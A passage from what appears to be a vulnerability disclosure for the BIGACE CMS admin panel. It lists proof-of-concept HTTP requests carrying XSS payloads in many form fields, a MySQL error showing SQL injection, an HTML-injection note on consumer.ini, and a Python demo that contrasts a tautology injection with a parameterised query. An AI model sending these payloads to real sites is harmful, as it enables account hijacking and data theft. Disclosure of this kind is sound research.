-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1045
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
"><script>alert(3)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1053
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
"></textarea><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
21. SQL Injection
The MySQL error below was returned by the admin page. The injected string
lands inside the quotes of the language='...' condition, so the language
value is concatenated into the query without escaping and the leading
single quote of the payload terminates the literal early:
<td valign="top">MySQL error (1064:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'x"/onerror="alert(4321)">'' at
line 1) for [SELECT count(id) as amount FROM cms_item_future WHERE itemtype='1' AND
id='-1' AND cid='1' AND language=''>"><img/src="x"/onerror="alert(4321)">'
;]
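The error above is the signature of string concatenation, and the same concatenation that produces a syntax error with an XSS payload produces a different result set with a SQL payload. The Python example below is added here and is not BIGACE code: it rebuilds the query from the error message over a constructed in-memory sqlite3 table (standing in for MySQL; the column names are taken from the query, the rows are invented) and runs the page's payload and a tautology through both the concatenated form and a parameterised form.

```python
import sqlite3

# The value from the error message above; its leading single quote closes the
# language='...' literal, which is why MySQL reported error 1064.
PAYLOAD = "'>\"><img/src=\"x\"/onerror=\"alert(4321)\">"


def make_db():
    """Constructed stand-in for cms_item_future (sqlite3 in memory instead of MySQL)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE cms_item_future "
                "(id INTEGER, itemtype INTEGER, cid INTEGER, language TEXT)")
    con.executemany("INSERT INTO cms_item_future VALUES (?, ?, ?, ?)",
                    [(-1, 1, 1, "en"), (-1, 1, 1, "de"), (5, 1, 1, "en")])
    return con


def count_concat(con, language):
    """Vulnerable form: the value is pasted into the statement text, as the error shows."""
    sql = ("SELECT count(id) as amount FROM cms_item_future WHERE itemtype='1' "
           "AND id='-1' AND cid='1' AND language='" + language + "'")
    return con.execute(sql).fetchone()[0]


def count_param(con, language):
    """Hardened form: the value travels as a bound parameter and never touches the SQL text."""
    sql = ("SELECT count(id) as amount FROM cms_item_future WHERE itemtype=? "
           "AND id=? AND cid=? AND language=?")
    return con.execute(sql, (1, -1, 1, language)).fetchone()[0]


def concat_breaks(language):
    """True when the concatenated query is rejected by the database (the 1064-style error)."""
    try:
        count_concat(make_db(), language)
        return False
    except sqlite3.OperationalError:
        return True


def demo():
    """Compare both forms on a normal value, a tautology, and the page's payload."""
    con = make_db()
    tautology = "' OR '1'='1"
    return {
        "en": (count_concat(con, "en"), count_param(con, "en")),                    # (1, 1)
        "tautology": (count_concat(con, tautology), count_param(con, tautology)),  # (3, 0)
        "payload_concat_breaks": concat_breaks(PAYLOAD),                           # True
        "payload_param": count_param(con, PAYLOAD),                                # 0
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The tautology case is the one to note: the concatenated query counts every row in the table, while the bound parameter simply finds no language called `' OR '1'='1`. The XSS payload merely breaks the statement here, which is why the admin page showed an error rather than behaving differently; a payload written for SQL rather than for the browser would not.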
22. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52
start='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&amount=10&namespace=&level=
---< request >---
23. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52
start=1560&amount="%20body%20onload%3d"alert(4321)"%3e&namespace=&level=
---< request >---
24. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=community_tADMIN_len HTTP/1.1
Host: 10.149.14.52
s4lv09G4d=j6dbng376&o8F5hJ39y='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&kjhgzt87D=asd
---< request >---
25. xss + info disclosure
---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len
Cookie: PHPSESSID=d0mbv9u7103sdm3350bi0gepv0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
mode='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX
---< request >---
26. adding a new community
The value submitted when adding a new community is written directly into the
file consumer.ini as a section header. A malformed value can break the
configuration and crash the site:
root@bt:/var/www/bigace# grep -n -r -e aaaaaaaa ./
./system/config/consumer.ini:9:[aaaaaaaaaaa]
After that I replaced the 'aaaa' string with HTML to check whether the page
renders it as HTML rather than as text. HTML injection is possible here.
27. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
28. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
29. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
30. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=maintenance_tADMIN_len HTTP/1.1
Host: 10.149.14.52
s4lv09G4d=u5FN80Ky&zhtf5fikj=q39854ljh&jhgf854ih='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
---< request >---
31. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
32. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
Cheers o/
Labels: 0day, bigace, code review, exploit, research, sql injection, tools, vulnerability